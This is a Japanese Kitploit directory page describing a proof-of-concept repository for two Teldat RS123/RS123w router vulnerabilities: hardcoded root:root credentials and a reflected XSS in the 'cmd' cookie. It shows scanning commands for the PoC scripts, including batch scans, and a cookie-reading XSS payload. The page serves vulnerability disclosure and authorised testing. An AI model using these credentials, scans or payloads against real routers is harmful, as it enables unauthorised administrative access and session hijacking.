Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Teldat-Router-CVE-2022-POC — Teldat RS123/RS123w ルーターにおける CVE-2022-39996 (反射型XSS) および CVE-2022-39997 (弱いパスワード) のPoC | Kitploit
ツール/GitHubGitHub/uyhacked/teldat-router-cve-2022-poc
パスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubuyhacked/teldat-router-cve-2022-poc

Teldat-Router-CVE-2022-POC

Teldat RS123/RS123w ルーターにおける CVE-2022-39996 (反射型XSS) および CVE-2022-39997 (弱いパスワード) のPoC

リポジトリを見る
2ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Teldat ルーター CVE-2022-39996 & CVE-2022-39997 POC

Teldat RS123 / RS123w ルーターで発見された 2 つの脆弱性の概念実証(POC)です。

概要

CVE ID種別CWECVSS重要度
CVE-2022-39996反射型 XSSCWE-796.1中
CVE-2022-39997脆弱なパスワードCWE-5219.8重大

影響を受ける製品: Teldat RS123、RS123w ルーター


CVE-2022-39997 - 脆弱なパスワード

説明

Teldat RS123/RS123w ルーターには、ハードコードされたデフォルト認証情報 root:root が搭載されています。管理者はこれを変更せずに放置することが多く、認証されていない攻撃者が Telnet、SSH、HTTP、その他のサービスを介して完全な管理アクセスを取得できるようになります。

実証

root@kitploit:~
Account: root
Password: root

弱パスワード POC

使用方法

root@kitploit:~
pip install requests paramiko

# Basic check (Telnet, SSH, HTTP)
python CVE-2022-39997.py -t 192.168.1.1

# Full check (all services including HTTPS, FTP)
python CVE-2022-39997.py -t 192.168.1.1 --all

# Batch scan
python CVE-2022-39997.py -f targets.txt

CVE-2022-39996 - 反射型 XSS

説明

/upgrade/index.html エンドポイントは、サニタイズ処理を行わずに cmd HTTP Cookie の値をレスポンスに反映します。攻撃者は cmd Cookie に JavaScript を含む悪意のあるリクエストを作成できます。認証済みの管理者がページにアクセスすると、スクリプトはルーターの Web インターフェースのブラウザーコンテキストで実行され、セッションハイジャックや設定の改ざんが可能になります。

実証

  • cmd Cookie に XSS ペイロードを作成:

XSS POC 1

  • ブラウザーでトリガーされた XSS:

XSS POC 2

使用方法

root@kitploit:~
pip install requests

# Basic XSS check
python CVE-2022-39996.py -t 192.168.1.1

# With HTTP Basic Auth credentials
python CVE-2022-39996.py -t 192.168.1.1 -u root -p root

# Test multiple XSS payloads for confirmation
python CVE-2022-39996.py -t 192.168.1.1 --multi

# Generate standalone POC HTML page
python CVE-2022-39996.py -t 192.168.1.1 --gen-poc

# Custom XSS payload
python CVE-2022-39996.py -t 192.168.1.1 --payload "<script>alert(document.cookie)</script>"

ファイル

ファイル説明
CVE-2022-39997.py脆弱なパスワードの検出(Telnet / SSH / HTTP / FTP)
CVE-2022-39996.pycmd Cookie を介した反射型 XSS の検出
Teldat's Router Vulnerability.md完全な脆弱性開示レポート

免責事項

これらの POC スクリプトは、教育目的および許可を得たセキュリティテスト専用です。所有していない、またはテストする明示的な許可を得ていないシステムに対して使用しないでください。作者は、誤用や損害について一切の責任を負いません。

ツールをダウンロード